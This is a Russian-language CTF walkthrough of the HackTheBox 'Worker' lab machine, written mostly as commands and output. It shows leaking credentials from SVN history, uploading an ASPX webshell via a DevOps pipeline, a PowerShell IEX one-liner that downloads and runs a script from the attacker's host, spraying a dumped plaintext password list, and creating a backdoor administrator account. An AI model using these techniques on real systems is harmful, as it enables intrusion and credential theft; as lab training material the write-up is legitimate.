Обзор сервисов 

$ nmapAutomator.sh -H 10.10.10.203 -t Full

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SVN 

$ svn ls svn://10.10.10.203:3690
$ svn checkout svn://10.10.10.203:3690
$ cat moved.txt
http://devops.worker.htb

Парс поддоменов:

$ curl -s http://dimension.worker.htb/#work | grep -oh 'http://.*worker.htb'
http://alpha.worker.htb
http://cartoon.worker.htb
http://lens.worker.htb
http://solid-state.worker.htb
http://spectral.worker.htb
http://story.worker.htb

$ svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 16:50:20 +0300 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 16:46:19 +0300 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 16:45:16 +0300 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 16:43:43 +0300 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------


$ svn up -r3
$ cat deploy.ps1
$user = "nathen"
# NOTE: We cant have my password here!!!
$plain = ""
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")


$ svn up -r2
$ cat deploy.ps1:

$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

=> http://devops.worker.htb/ekenas/
nathen:wendel98

Пайплайны

Не можем модифицировать пайплайны, но можем просматривать ихю.

spectral ci => uploads target to w:\sites\$(Build.Repository.Name).worker.htb => w:\sites\spectral.worker.htb (write access)

Git 

git clone http://nathen:[email protected]/ekenas/SmartHotel360/_git/spectral
cd spectral
git checkout -b shell
cp /usr/share/webshells/aspx/cmdasp.aspx .
git add cmdasp.aspx
git commit -m "added"
git push -u origin shell

Идем в pull requests => создаем новый pull request => одобряем его => запускаем spectral CI pipeline => http://spectral.worker.htb/cmdasp.aspx

nc -lnvp 1234
python3 -m http.server 80

> powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.6/shell.ps1')"

Брутфорс 

W:\svnrepos\www\conf> type passwd
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

=> помещаем пользователей в users.txt, пароли в passwords.txt => crackmapexec (cme)

cme winrm -u users.txt -p passwords.txt --no-bruteforce

=> robisl:wolves11

Флаг пользователя 

evil-winrm -i 10.10.10.203 -u robisl -p wolves11

*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
    Directory: C:\Users\robisl\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/2/2021  12:33 PM             34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::ecaf:aa9d:8b8e:c46a
   Link-local IPv6 Address . . . . . : fe80::ecaf:aa9d:8b8e:c46a%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
43c018b7ce295eb71cbfd2cf25b7ab3c

Повышение привилегий

Логинимся в devops как robisl:wolves11 => пользователь админ и может создавать пайплайны.

Создаем пайплайн (basic) => empty pipeline => добавляем powershell script:

net user cube Password123! /add ; net localgroup administrators cube /add

Флаг суперпользователя 

evil-winrm -i 10.10.10.203 -u cube -p Password123!

*Evil-WinRM* PS C:\users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::ecaf:aa9d:8b8e:c46a
   Link-local IPv6 Address . . . . . : fe80::ecaf:aa9d:8b8e:c46a%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
*Evil-WinRM* PS C:\users\Administrator\Desktop> type root.txt
953e1b038f1f8a9d978b2b630b122d15